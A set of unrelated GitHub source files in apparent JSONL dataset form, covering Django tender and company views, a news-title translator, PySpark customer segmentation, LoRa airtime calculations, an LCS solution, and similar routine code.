try:\n apply_tender = paginator.page(page)\n except PageNotAnInteger:\n apply_tender = paginator.page(1)\n except EmptyPage:\n apply_tender = paginator.page(paginator.num_pages)\n\n context = {\n 'apply_tender': apply_tender\n }\n return render(request, 'Holder/ApplyHolder/apply_tender_list.html', context=context)\n\n\n@login_required(login_url='log_in')\ndef apply_tender_create(request, tender_id):\n tender = TenderUpload.objects.get(id=tender_id)\n form = ApplyTenderForm()\n if request.method == \"POST\":\n form = ApplyTenderForm(request.POST or None, request.FILES or None, instance=tender)\n if form.is_valid():\n ta = form.save(commit=False)\n tender_apply = ApplyTender()\n tender_apply.tender = tender\n tender_apply.username = request.user\n tender_apply.number = form.cleaned_data['number']\n tender_apply.trx_id = form.cleaned_data['trx_id']\n tender_apply.bank_trx_id = form.cleaned_data['bank_trx_id']\n tender_apply.proposal_pdf = form.cleaned_data['proposal_pdf']\n tender_apply.working_experience = form.cleaned_data['working_experience']\n tender_apply.proposed_amount = form.cleaned_data['proposed_amount']\n tender_apply.payment_method = form.cleaned_data['payment_method']\n tender_apply.bank_check_image = form.cleaned_data['bank_check_image']\n tender_apply.save()\n context = {\n 'form': form\n }\n return render(request, 'Holder/ApplyHolder/apply_holder_create.html', context=context)\n if request.method == \"GET\":\n context = {\n 'form': form\n }\n return render(request, 'Holder/ApplyHolder/apply_holder_create.html', context=context)\n\n\ndef holder_list_of_holder_short_list(request, tender_id):\n short_list = ApplyTenderHolderShortList.objects.filter(tender__tender__id=tender_id)\n context = {\n 'short_list': short_list\n }\n return render(request, 'Holder/ApplyHolder/apply_tender_holder_short_list.html', context=context)\n\n\ndef holder_winner_holder_list(request, tender_id):\n # winner_holder = WinnerHolder.objects.filter(tender=tender_id)\n tender = TenderUpload.objects.get(id=tender_id)\n print('tender ==', tender.id)\n winner_holder = WinnerHolder.objects.filter(tender__tender__id=tender_id)\n context = {\n 'winner_holder': winner_holder\n }\n return render(request, 'Holder/ApplyHolder/winner_holder_list.html', context=context)\n\n\ndef user_winner_holder_list(request):\n winner_holder = WinnerHolder.objects.filter(username=request.user)\n page = request.GET.get('page', 1)\n paginator = Paginator(winner_holder, 10)\n try:\n winner_holder = paginator.page(page)\n except PageNotAnInteger:\n winner_holder = paginator.page(1)\n except EmptyPage:\n winner_holder = paginator.page(paginator.num_pages)\n\n context = {\n 'winner_holder': winner_holder\n }\n return render(request, 'Holder/ApplyHolder/my_tender_list.html', context=context)\n\n\ndef about(request):\n return render(request, 'about.html')\n\n\ndef service(request):\n return render(request, 'service.html')\n\n\ndef all_tender_notice(request):\n tender_notice = TenderNotice.objects.all().order_by('created_date')\n page = request.GET.get('page', 1)\n paginator = Paginator(tender_notice, 10)\n try:\n tender_notice = paginator.page(page)\n except PageNotAnInteger:\n tender_notice = paginator.page(1)\n except EmptyPage:\n tender_notice = paginator.page(paginator.num_pages)\n context = {\n 'tender_notice': tender_notice\n }\n return render(request, 'tender_notice.html', context=context)\n","repo_name":"Toufiqul-Islam-Noyon/ETender","sub_path":"holder/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70473753853","text":"from bs4 import BeautifulSoup\nimport requests\nimport asyncio\nimport time\nfrom googletrans import Translator\nimport async_google_trans_new\n\n\nclass Interpreter:\n\n def __init__(self, url):\n self.url = url\n self.titles = None\n self.list_ = None\n\n def get_titles(self):\n response = requests.get(self.url)\n response = response.text\n soup = BeautifulSoup(response, \"html.parser\")\n # либо оставляем html.parser либо надо ставить ещё дополнительную депенденси в виде pip install xml\n titles = soup.findAll('title')\n titles = [str(title).replace(' >', \"\").replace('', \"\").replace('', \"\").replace('NYT', \"\")\n for title in titles]\n self.titles = list(set(titles))\n print(self.titles)\n\n def translate_titles(self):\n self.list_ = []\n translator = Translator()\n for title in self.titles:\n translation = translator.translate(text=title, dest='ru', src='auto')\n self.list_.append(translation.text)\n print(f\"finished at {time.strftime('%X')}\")\n\n async def async_translate_titles(self):\n g = async_google_trans_new.AsyncTranslator()\n list_ = []\n for title in self.titles:\n list_.append(g.translate(title, \"ru\"))\n self.list_ = await asyncio.gather(*list_)\n\n def translation_to_file(self):\n with open(\"translated.txt\", 'w') as file:\n for item in self.list_:\n file.write(item + \"\\n\")\n with open(\"original.txt\", \"w\", encoding=\"utf-8\") as file:\n for title in self.titles:\n file.write(title + \"\\n\")\n\n\nif __name__ == '__main__':\n print(f\"started at {time.strftime('%X')}\")\n URL = \"https://rss.nytimes.com/services/xml/rss/nyt/World.xml\"\n some_interp = Interpreter(URL)\n some_interp.get_titles()\n loop = asyncio.get_event_loop()\n loop.run_until_complete(some_interp.async_translate_titles())\n loop.close()\n some_interp.translation_to_file()\n print(f\"finished at {time.strftime('%X')}\") \n","repo_name":"egorsemevskiy/NewsAggr","sub_path":"url_to_translation.py","file_name":"url_to_translation.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28131497563","text":"from django.conf.urls import url, include\nfrom .views import (HorarioCreateView,HorarioListView,HorarioUpdateView,HorarioDeleteView,\n\t HorarioListAPIView,HoraListaAPIView,HorarioAPI,HorarioCreateView,HorarioDeleteAPIView,HorarioUpdateAPIView)\n\nurlpatterns = [ \n\n url(r'^add$', (HorarioCreateView.as_view()), name='adicionar_horario'),\n url(r'^lst', (HorarioListView.as_view()), name='listar_horarios'),\n url(r'^upd/(?P\\d+)/$', (HorarioUpdateView.as_view()), name='editar_horario'),\n url(r'^dlt/(?P\\d+)/$',HorarioDeleteView.as_view(), name='eliminar_horario'),\n # url(r'^api', HorarioList.as_view(), name='horario-list'),\n # urls de las APIS\n url(r'^lstapi',HorarioListAPIView.as_view(), name=\"lstapi\"),\n url(r'^lstaapi',HorarioAPI.as_view(), name=\"lstaapi\"),\n url(r'^add-api',HorarioCreateView.as_view(),name=\"add-api\"),\n url(r'^upd-api/(?P\\d+)/$',HorarioCreateView.as_view(),name=\"upd-api\"),\n url(r'^dlt-api/(?P\\d+)/$',HorarioDeleteAPIView.as_view(),name=\"dlt-api\"),\n\n\n]\n\n","repo_name":"dyronrh/hcmfront-for-test","sub_path":"horario/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8062921898","text":"#!/usr/bin/env python3\nimport unittest\nfrom modules.classify import classify\nfrom modules.features import feature_combinations\nimport pandas as pd\nimport json\n\nclass TestCalc(unittest.TestCase):\n\n def test_getData(self):\n t=classify()\n t.bam='test/data/test.bam'\n t.inVCF='test/data/MRSA_r9_10.vcf'\n t.ref='test/data/MRSA252_mut.fasta'\n t.getData()\n #t.SNPs.to_csv('test/data/example_classifier_data.csv')\n dfExpected=pd.read_csv('test/data/example_classifier_data.csv',index_col=0)\n pd._testing.assert_frame_equal(t.SNPs, dfExpected)\n\n def test_classifier(self):\n t=classify()\n t.combination='composite'\n t.keep=set()\n t.probFilt=0\n t.maskWeak = False\n\n t.modelFile='test/data/r9.4.1_composite_model.sav'\n t.SNPs=pd.read_csv('test/data/example_classifier_data_full.csv',index_col=0)\n t.loadModel()\n t.classify()\n #t.SNPs.to_csv('test/data/example_classified_data_full.csv')\n dfExpected=pd.read_csv('test/data/example_classified_data_full.csv',index_col=0)\n pd._testing.assert_frame_equal(t.SNPs, dfExpected)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"oxfordmmm/forest_filter","sub_path":"test/test_classify.py","file_name":"test_classify.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41107532949","text":"# Created by Mohamad ChamanMotlagh\n# 06/04/2021\nimport math\n\n\ndef calculate_bitrate(bw, sf, cr):\n bitrate = bw / (2 ** sf)\n bitrate *= sf * cr\n return round(bitrate, 2)\n\n\ndef calculate_sensitivity(bw, sf):\n snr = 10 * math.log10(31 / (2 ** sf))\n sensitivity = -174 + 6 + snr\n sensitivity += 10 * math.log10(bw * 1000)\n return round(sensitivity, 2)\n\n\ndef calculate_toa(bw, sf, cr, pl):\n temp = ((8 * pl) - (4 * sf) + 28 + 16) / (4 * (sf - 2))\n n = 8 + max(math.ceil(temp * (cr + 4)), 0)\n tpl = n * ((2 ** sf) / bw)\n tpr = (4.25 + 8) * ((2 ** sf) / bw)\n toa = tpr + tpl\n return round(toa, 2)\n\n\ndef print_line():\n for i in range(105):\n print(\"_\", end='')\n print()\n\n\ndef main():\n cr = 4 / 5\n pl = 10\n print_line()\n print(\"\\t\\t\\t\\t125kHz\\t\\t\\t\\t\\t|\\t\\t\\t150kHz\\t\\t\\t\\t|\\t\\t\\t500kHz\")\n print_line()\n print(\"\\t Bitrate\\t\\tSensitivity\\tToA \\tBitrate\\t\\tSensitivity\\tToA\\t\\tBitrate\\t\\tSensitivity\\tToA\")\n for sf in [7, 8, 9, 10, 11, 12]:\n print(\"SF = \" + str(sf) + \": \", end='')\n for bw in [125, 250, 500]: # bw in kHz\n print(str(calculate_bitrate(bw, sf, cr)) + \"\\t\\t\" + str(calculate_sensitivity(bw, sf)) + \"\\t\\t\" + str(\n calculate_toa(bw, sf, cr, pl)) + \"\\t|\", end='')\n print()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MohamadCM/IoT-Practice","sub_path":"3/Source_code/lora_specification.py","file_name":"lora_specification.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"73129233212","text":"from fastapi import Depends, FastAPI\nfrom sqlalchemy.orm import Session\n\nimport crud\nfrom database import SessionLocal\nfrom schemas import DriverResponse, DriverFilter\n\napp = FastAPI()\n\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n\n@app.get(\"/drivers/\", response_model=DriverResponse)\ndef get_users(\n driver: DriverFilter,\n db: Session = Depends(get_db)\n):\n drivers = []\n try:\n drivers = crud.get_drivers(db, driver)\n response_dict = {\"code\": \"0\", \"msg\": \"success\", \"records\": drivers}\n except Exception as exc:\n response_dict = {\"code\": \"-1\", \"msg\": \"failure\", \"records\": drivers}\n return DriverResponse(**response_dict)\n","repo_name":"lerime/driver-api-backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14737425288","text":"\"\"\"\nSubtree query operations for Tree() objects.\n\"\"\"\n\nimport array\nfrom typing import List, Dict, Any\n\nclass SubtreeQuery():\n\n def get_subtree_size(self, node: int) -> int:\n \"\"\"\n Returns the number of nodes in the subtree rooted at the given node.\n \"\"\"\n self._check_node_number(node)\n return self.subtree_sizes[node]\n\n def get_treedata_coord(self, node: int) -> int:\n \"\"\"\n Returns the position of the given node in the treedata array.\n \"\"\"\n self._check_node_number(node)\n return self.coords[node]\n\n def get_subtree_data(self, subtree_root: int) -> array.array:\n \"\"\"\n Returns the treedata array for the subtree rooted at the given node.\n\n This includes nodes marked as deleted.\n \"\"\"\n self._check_node_number(subtree_root)\n pos = self.get_treedata_coord(subtree_root)\n if pos > 0:\n subtree_size = self.get_subtree_size(subtree_root)\n return self.treedata[pos:pos + subtree_size]\n else:\n return array.array(\"Q\")\n\n def subtree_ids(self, subtree_root: int) -> array.array:\n \"\"\"\n Returns the IDs of the nodes in the subtree rooted at the given node.\n \"\"\"\n self._check_node_number(subtree_root)\n result = array.array(\"Q\")\n for node_id in self.get_subtree_data(subtree_root):\n if node_id != self.UNDEF:\n result.append(node_id)\n return result\n\n def subtree_info(self, subtree_root: int, attributes: List[str] = [],\n include_subtree_sizes: bool = False,\n include_parents: bool = False,\n show_stats: bool = False,\n node_id_key = \"node_id\",\n subtree_size_key = \"subtree_size\",\n parent_key = \"parent\") -> Dict[str, List[Any]]:\n result = {}\n node_ids = self.get_subtree_data(subtree_root)\n result[node_id_key] = node_ids\n if include_subtree_sizes:\n result[subtree_size_key] = []\n for node_id in node_ids:\n if node_id != self.UNDEF:\n result[subtree_size_key].append(self.get_subtree_size(node_id))\n else:\n result[subtree_size_key].append(None)\n if include_parents:\n result[parent_key] = []\n for node_id in node_ids:\n if node_id != self.UNDEF:\n result[parent_key].append(self.get_parent(node_id))\n else:\n result[parent_key].append(None)\n if attributes:\n attr_values = self.query_attributes(subtree_root, attributes, show_stats)\n for attrname in attributes:\n result[attrname] = attr_values[attrname]\n return result\n\n","repo_name":"ggonnella/fastsubtrees","sub_path":"fastsubtrees/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"3651389222","text":"from scipy.spatial.distance import cdist\nimport numpy as np\nimport scipy as sc\nimport sys\n\n# X = np.zeros((10,3))\n# X[:,0]=np.arange(1,11)\n# print(X)\n# c = cdist(X, X, 'euclidean')\n# print(c)\n# l = int(X.shape[0]/2)\n# print(l)\n# print(X[:l], X[l:])\n# c00=cdist(X[:l], X[:l], 'euclidean')\n# c01=cdist(X[:l], X[l:], 'euclidean')\n# # c10=cdist(X[l:, :l], X[l:, :l], 'euclidean')\n# c11=cdist(X[l:], X[l:], 'euclidean')\n# c2=np.block([[c00,c01], [c01,c11]])\n# print(c00,c01,c11,c2)\n\n\ndef rec_cdist(X, Y, metric = \"euclidean\"):\n try :\n c = cdist(X, Y, metric=metric)\n except ValueError :\n print(\"The shape of the matrix is too big to be calculated by cdist directly,\\\n subdivision of the matrix initiated. It might take a moment\")\n l = int(X.shape[0]/2)\n print(\"########\",l,\"\\n\")\n c00=rec_cdist(X[:l], Y[:l], metric=metric)\n c01=rec_cdist(X[:l], Y[l:], metric=metric)\n c11=rec_cdist(X[l:], Y[l:], metric=metric)\n c=np.block([[c00,c01], [c01,c11]])\n return c\n\n\n\nif __name__ == \"__main__\":\n # len = 100000\n # X = np.zeros((len,3), dtype=np.float64)\n # X[:,0]=np.arange(0,len)\n # X.astype(\"float32\")\n # print(rec_cdist(X,X))\n print(np.intp)\n print(sys.maxsize > 2**32)\n print(sys.executable)\n","repo_name":"olaurendin/Kriging","sub_path":"tests/test_cdist.py","file_name":"test_cdist.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2265813194","text":"# 백준 9252번 LCS 2\nimport sys\nfrom collections import deque\n\nS1 = input()\nS2 = input()\n\n# 문자열 이차원 dp도 생성\ndp = [[0] * (len(S1)+1) for _ in range(len(S2)+1)]\ndp2 = [[''] * (len(S1)+1) for _ in range(len(S2)+1)]\n\nif S1[0] == S2[0]:\n dp[1][1] = 1\n dp2[1][1] = S1[0]\n\nfor i in range(1,len(S2)+1):\n for j in range(1,len(S1)+1):\n\n if S2[i-1] == S1[j-1]:\n dp[i][j] = dp[i-1][j-1] + 1\n dp2[i][j] = dp2[i-1][j-1] + S2[i-1]\n # 그게 아니라면 이전 행의 값과 이전 열의 값 중\n # 더 높은 값을 현재 dp값으로 초기화 시켜준다.\n else:\n dp[i][j] = max(dp[i-1][j], dp[i][j-1])\n # 문자열을 초기화 시켜줌\n if dp[i][j] == dp[i-1][j]:\n dp2[i][j] = dp2[i-1][j]\n else:\n dp2[i][j] = dp2[i][j-1]\nprint(dp[-1][-1])\nprint(dp2[-1][-1])\n","repo_name":"jihun-24k/Algorithm","sub_path":"Baek_joon/LCS2.py","file_name":"LCS2.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"237467115","text":"import svgwrite\nimport math\n\niterations = 18\nangle = 5\nangle_rad = math.radians(angle)\nscale = 1 / (math.sin(angle_rad) + math.cos(angle_rad))\n\ndwg = svgwrite.Drawing(\"images/test.svg\", profile=\"full\")\n\nfor i in range(iterations):\n rect = dwg.rect((-50, -50), (100, 100), stroke=\"black\")\n rect.fill(\"blue\", opacity=0)\n rect.rotate(angle * i)\n # rect.scale(math.pow(scale,i))\n dwg.add(rect)\n\ndwg.save()\n","repo_name":"shymmetry/geo-svg","sub_path":"make-svg.py","file_name":"make-svg.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3168391582","text":"from rest_framework import serializers\n\nfrom data_import.models import DataFile\nfrom data_import.serializers import DataFileSerializer\n\nfrom .models import DataRequestProject, DataRequestProjectMember\n\n\nclass ProjectDataSerializer(serializers.ModelSerializer):\n \"\"\"\n Serialize data for a project.\n \"\"\"\n\n class Meta: # noqa: D101\n model = DataRequestProject\n\n\nclass ProjectMemberDataSerializer(serializers.ModelSerializer):\n \"\"\"\n Serialize data for a project member.\n \"\"\"\n\n class Meta: # noqa: D101\n model = DataRequestProjectMember\n\n fields = [\n 'created',\n 'project_member_id',\n 'message_permission',\n 'sources_shared',\n 'username',\n 'data',\n ]\n\n username = serializers.SerializerMethodField()\n data = serializers.SerializerMethodField()\n\n @staticmethod\n def get_username(obj):\n \"\"\"\n Only return the username if the user has shared it with the project.\n \"\"\"\n if obj.username_shared:\n return obj.member.user.username\n\n return None\n\n @staticmethod\n def get_data(obj):\n \"\"\"\n Return current data files for each source the user has shared with\n the project, including the project itself.\n \"\"\"\n files = DataFile.objects.filter(\n user=obj.member.user,\n source__in=obj.sources_shared_including_self).exclude(\n parent_project_data_file__completed=False).current()\n\n return [DataFileSerializer(data_file).data for data_file in files]\n\n def to_representation(self, obj):\n rep = super(ProjectMemberDataSerializer, self).to_representation(obj)\n\n if not rep['username']:\n rep.pop('username')\n\n return rep\n","repo_name":"gitter-badger/open-humans","sub_path":"private_sharing/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"34095749292","text":"from django.contrib import admin\nfrom django import forms\n\n\nfrom .models import Company,State,Country,District\n\n# Register your models here.\n\n\n\nclass CompanyAdminForm(forms.ModelForm):\n\n state = forms.ModelChoiceField(label='地市',queryset=State.objects.none())\n district = forms.ModelChoiceField(label='区域',queryset=State.objects.none())\n\n def __init__(self, *args, **kwargs):\n ins = kwargs.get('instance')\n super(CompanyAdminForm, self).__init__(*args, **kwargs)\n\n if ins and ins.country:\n self.fields['state'].queryset = State.objects.filter(country=ins.country)\n if ins and ins.district:\n self.fields['district'].queryset = District.objects.filter(state=ins.state)\n\n if 'state' in self.data and self.data['country']:\n self.fields['state'].queryset = State.objects.filter(country=self.data['country'])\n if 'district' in self.data and self.data['state']:\n self.fields['district'].queryset = District.objects.filter(state=self.data['state'])\n\n\n\n class Meta:\n model = Company\n fields = '__all__'\n #exclude=['state']\n\n\nclass CompanyAdmin(admin.ModelAdmin):\n form = CompanyAdminForm\n\n\nadmin.site.register(Company,CompanyAdmin)\nadmin.site.register(Country)\nadmin.site.register(State)\nadmin.site.register(District)\n","repo_name":"nodeweb/examples","sub_path":"djangoApp/company/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40905379446","text":"\nfrom pyspark.sql import functions as f\nfrom pyspark.sql import Window\n\nimport products_embedding.src.pull_input_data as ingress\n\n\n########################\n# PURPOSE\n########################\n##\n# This file establishes assumes it is passed the correct households that need to be HML'd.\n# It generates the spend and unit penetration pillars and assigns weights accordingly\n##\n\ndef pull_hml_kpis(active_modality_kpis, preassigned_hml_hhs_df, quarters_df):\n \"\"\"\n This function calculates quarter level spend and unit KPIs from provided Vintages DF.\n\n Inputs:\n 1) active_modality_kpis - spark DF of vintage KPIs for desired modality\n 2) preassigned_hml_hhs_df - spark DF of households that deserve an HML\n 3) quarters_df - spark DF that maps fiscal_week to quarter\n\n Output:\n active_hml_kpis - spark DF that aggregates modality spend and units at ehhn-quarter level\n \"\"\"\n\n active_hml_kpis = (active_modality_kpis\n # filter to HML households\n .join(preassigned_hml_hhs_df.select('ehhn'), ['ehhn'], 'inner')\n .join(quarters_df, 'fiscal_week', 'inner')\n\n # use these to generate quartiles\n .groupBy('ehhn', 'quarter')\n .agg(f.sum('weekly_sales').alias('sales'),\n f.sum('weekly_units').alias('units')\n )\n )\n\n return active_hml_kpis\n\n\ndef pull_ent_quarterly_behavior(acds, start_week, end_week, quarters_df):\n \"\"\"\n This function pulls enterprise visits so we can calculate modality visit penetration\n\n Inputs:\n 1) acds - ACDS object, input to `pull_vintages_df`\n 2) config - dict of configs, used for filepaths\n 3) start_week - first fiscal_week to pull (oldest)\n 4) end_week - last fiscal_week to pull (most recent)\n 5) quarters_df - spark DF that maps fiscal_week to quarter\n\n Output:\n active_ent_quarterly_behavior - spark DF that aggregates modality visits at ehhn-quarter level\n \"\"\"\n\n active_ent_quarterly_behavior = (ingress.pull_vintages_df(acds, 'enterprise', start_week, end_week, 'sales')\n .select('ehhn', 'fiscal_week', 'weekly_units')\n .join(quarters_df, 'fiscal_week', 'inner')\n .groupBy('ehhn', 'quarter')\n .agg(f.sum('weekly_units').alias('enterprise_units'))\n )\n\n return active_ent_quarterly_behavior\n\n\ndef combine_pillars(active_hml_kpis, active_ent_quarterly_behavior):\n \"\"\"\n This function combines enterprise quarter visits with modality quarter aggregations.\n Produces modality visit penetration pillar necessary for weighting\n\n Inputs:\n 1) active_hml_kpis - spark DF, output of `pull_hml_kpis`\n 2) active_ent_quarterly_behavior - spark DF, output of `pull_ent_quarterly_behavior`\n\n Output:\n pillars_df - spark DF, contains all information needed to weight households on pillars\n \"\"\"\n\n pillars_df = (active_hml_kpis\n .join(active_ent_quarterly_behavior, ['ehhn', 'quarter'], 'inner')\n .withColumn('unit_penetration',\n f.round(f.col('units') / f.col('enterprise_units'), 4)\n )\n )\n\n return pillars_df\n\n\ndef create_weighted_df(pillars_df, qtr_weights_df, spend_thresholds=(.5, .9), visit_thresholds=(.5, .9)):\n \"\"\"\n This function assigns weights at a quarter level based on provided cutoffs and calculated percentiles.\n Then it assigns initial HML groups at a quarter level, and uses them to assign quarter points.\n Last, it weights quarter points by quarter recency weights\n\n Inputs:\n 1) pillars_df - spark DF, output from `combine_pillars`\n 2) qtr_weights_df - spark DF, maps quarter number to its weight. output from `utils.create_quarter_weights_df`\n 3) spend_thresholds - these can be custom specified as a tuple, but have sensible defaults\n 3) visit_thresholds - these can be custom specified as a tuple, but have sensible defaults\n\n Output:\n\n \"\"\"\n high_spend_cutoff = spend_thresholds[1]\n medium_spend_cutoff = spend_thresholds[0]\n\n high_visits_cutoff = visit_thresholds[1]\n medium_visits_cutoff = visit_thresholds[0]\n\n spend_window = Window.partitionBy('quarter').orderBy('sales')\n penetration_window = Window.partitionBy('quarter').orderBy('unit_penetration')\n\n weighted_df = (pillars_df\n .withColumn(f'spend_percentile', f.percent_rank().over(spend_window))\n .withColumn(f'penetration_percentile',\n f.when(f.col(f'unit_penetration') == 1, 1)\n .otherwise(f.percent_rank().over(penetration_window))\n )\n\n .withColumn('spend_rank',\n f.when(f.col('spend_percentile') >= high_spend_cutoff, 'H')\n .when(f.col('spend_percentile') >= medium_spend_cutoff, 'M')\n .otherwise('L')\n )\n .withColumn('penetration_rank',\n f.when(f.col('penetration_percentile') >= high_visits_cutoff, 'H')\n .when(f.col('penetration_percentile') >= medium_visits_cutoff, 'M')\n .otherwise('L')\n )\n\n .withColumn('quarter_points',\n\n # these 3 cover new markets\n f.when((f.col('spend_rank') == 'H') & (f.col('new_market_div') == 'new market'), 3)\n .when((f.col('spend_rank') == 'M') & (f.col('new_market_div') == 'new market'), 2)\n .when((f.col('spend_rank') == 'L') & (f.col('new_market_div') == 'new market'), 1)\n\n # these cover all existing markets which have BOTH pillars evaluated\n .when((f.col('spend_rank') == 'H') & (f.col('penetration_rank') == 'H'), 3)\n .when((f.col('spend_rank') == 'M') & (f.col('penetration_rank') == 'H'), 3)\n .when((f.col('spend_rank') == 'H') & (f.col('penetration_rank') == 'M'), 3)\n\n .when((f.col('spend_rank') == 'M') & (f.col('penetration_rank') == 'M'), 2)\n .when((f.col('spend_rank') == 'L') & (f.col('penetration_rank') == 'H'), 2)\n .when((f.col('spend_rank') == 'H') & (f.col('penetration_rank') == 'L'), 2)\n\n .when((f.col('spend_rank') == 'L') & (f.col('penetration_rank') == 'L'), 1)\n .when((f.col('spend_rank') == 'M') & (f.col('penetration_rank') == 'L'), 1)\n .when((f.col('spend_rank') == 'L') & (f.col('penetration_rank') == 'M'), 1)\n .otherwise(0)\n )\n\n .join(qtr_weights_df, 'quarter', 'left')\n\n .withColumn('recency_adjusted_quarter_points',\n f.round(f.col('quarter_points') * f.col('weight'), 4)\n )\n )\n\n return weighted_df\n\n\ndef create_weighted_segs(weighted_df):\n \"\"\"\n This function is the final step in the HMLs process. It takes the output from `create_weighted_df` and\n sums the scores to get the final HML points for each household. This is used to then assign final\n H/M/L scores.\n\n Input:\n 1) weighted_df - spark DF, output from `create_weighted_df`\n\n Output:\n weighted_segs - spark DF, has HMLs assigned to each household\n \"\"\"\n weighted_segs = (weighted_df\n .groupBy('ehhn')\n .agg(f.sum('recency_adjusted_quarter_points').alias('weighted_points'))\n .withColumn('segment',\n f.when(f.col('weighted_points') > 2, 'H')\n .when(f.col('weighted_points') > 1, 'M')\n .when(f.col('weighted_points') <= 1, 'L')\n .otherwise('ERROR')\n )\n # selects these two columns to match other DFs for easy union\n .select('ehhn', 'segment')\n )\n\n return weighted_segs\n","repo_name":"christianrodriguez-8451/non_endemic_segmentations","sub_path":"products_embedding/src/hmls.py","file_name":"hmls.py","file_ext":"py","file_size_in_byte":8563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"44043501232","text":"from .base import Protocol\nfrom .layer2 import ARP, Ethernet\nfrom .layer3 import ICMP, IPv4, IPv6\nfrom .layer4 import TCP, UDP\n\nSUPPORTED_PROTOCOLS = frozenset(cls.__name__.lower() for cls in Protocol.__subclasses__())\n\n\ndef is_supported_protocol(proto_name: str) -> bool:\n return proto_name.lower() in SUPPORTED_PROTOCOLS\n\n\n__all__ = (\n \"Protocol\",\n \"ARP\",\n \"Ethernet\",\n \"ICMP\",\n \"IPv4\",\n \"IPv6\",\n \"TCP\",\n \"UDP\",\n \"SUPPORTED_PROTOCOLS\",\n \"is_supported_protocol\",\n)\n","repo_name":"koczanm/nipsu","sub_path":"src/nipsu/protocols/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8549992198","text":"import re\n\nimport pandas as pd\n\nfrom src.bullet_detector import BulletsDetector\n\n\nclass Validator(object):\n def __init__(self):\n self.bullet_identifier = BulletsDetector()\n\n def validate(self, dataframes):\n result = list()\n for dataframe in dataframes:\n result.append(self.validate_bullet_and_split(dataframe))\n return result\n\n def validate_bullet_and_split(self, dataframe):\n bullets_to_validate = ['Sub-heading']\n df = pd.DataFrame(columns=dataframe.columns)\n bullets_found = self.bullet_identifier.detect_tag_specific_bullets(bullets_to_validate, dataframe)\n identifier = bullets_found.get('Sub-heading')\n new_index = -1\n for index, row in dataframe.iterrows():\n if row['Tag'] == 'Sub-heading' and identifier.is_bullet_present(row['Text']):\n splitted_text = re.split(r'(?<=\\w\\.)\\s', row['Text'])\n sub_heading = splitted_text[0]\n para = splitted_text[1]\n new_index += 1\n df.loc[new_index] = [sub_heading, 'Sub-heading', row['Typography'], row['Top_left'],\n row['Bottom_right'], row['File_Name'], row['Page_style'], row['Page_Number'],\n row['Tag_no'], row['Document_type']]\n new_index += 1\n df.loc[new_index] = [para, 'para', row['Typography'], row['Top_left'],\n row['Bottom_right'], row['File_Name'], row['Page_style'], row['Page_Number'],\n row['Tag_no'], row['Document_type']]\n new_index += 1\n df.loc[new_index] = [row['Text'], row['Tag'], row['Typography'], row['Top_left'],\n row['Bottom_right'], row['File_Name'], row['Page_style'], row['Page_Number'],\n row['Tag_no'], row['Document_type']]\n return df\n","repo_name":"rishavroy1264bitmesra/sample_code","sub_path":"src/backlog.py","file_name":"backlog.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29919707281","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def swapPairs(self, head: ListNode) -> ListNode:\n # if not head or not head.next:\n # return head\n # newh = head.next\n # head.next = self.swapPairs(newh.next)\n # newh.next = head\n # return newh\n if not head or not head.next:\n return head\n tmp = self.swapPairs(head.next.next)# 这部分可以继续走下去,用方法中的凉凉交换继续交换,完成后返回给head.next\n res = head.next\n res.next = head\n head.next = tmp\n return res\n\n\n\"\"\"\n交换链表中相邻的节点\n思路:\n递归)\n'''用 head 表示原始链表的头节点,新的链表的第二个节点,\n 用 newHead 表示新的链表的头节点,原始链表的第二个节点,则原始链表中的其余节点的头节点是 newHead.next。\n 令 head.next = swapPairs(newHead.next),表示将其余节点进行两两交换,交换后的新的头节点为 head 的下一个节点。\n 然后令 newHead.next = head,即完成了所有节点的交换。最后返回新的链表的头节点 newHead\n ![](https://pictures.ryanhor.com/20201013083930.png) 